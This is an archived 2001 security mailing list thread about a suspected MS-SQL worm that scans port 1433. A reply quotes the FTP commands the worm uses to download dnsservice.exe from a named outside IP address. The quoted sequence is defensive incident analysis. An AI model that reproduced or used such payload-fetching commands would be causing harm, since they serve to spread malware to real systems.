Security Incidents mailing list archives

Re: MS-SQL Worm?

From: "Arthur Donkers" <A.Donkers () reseau nl>
Date: Tue, 20 Nov 2001 17:47:16 +0100

To follow up on my own reply:

The worm ftp's to 207.29.192.160 and executes the following
ftp commands:

ftp
foo.com
bin
cd pub
cd tmp
get dnsservice.exe
close
quit

using anonymous ftp and foo.com as a password

My lesson: first read then reply ...

Arthur

----- Original Message ----- 
From: "Douglas P. Brown" <dugbrown () email unc edu>
To: <incidents () securityfocus com>; <unisog () sans org>
Cc: "ITS Security" <security () unc edu>
Sent: Tuesday, November 20, 2001 3:54 PM
Subject: MS-SQL Worm?


We saw a scan come in looking for systems answering on 1433, and
immediately saw several systems start scanning out for other systems
answering on 1433 - worm behavior?  Has anyone else seen this?

thanks,
-Doug
-- 
Douglas P. Brown
University of North Carolina
Manager of Security Resources
105 Abernethy Hall




----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

Current thread:

MS-SQL Worm? Douglas P. Brown (Nov 20)
- Re: MS-SQL Worm? Paul Nasrat (Nov 20)
  - Re: MS-SQL Worm? Arthur Donkers (Nov 20)
    - Re: MS-SQL Worm? Patrick Andry (Nov 20)
    - Re: MS-SQL Worm? Johannes Verelst (Nov 20)
    - Re: MS-SQL Worm? Unknown (Nov 20)
- Re: MS-SQL Worm? Arthur Donkers (Nov 20)
- Re: MS-SQL Worm? Arthur Donkers (Nov 20)
- Re: MS-SQL Worm? jabba (Nov 20)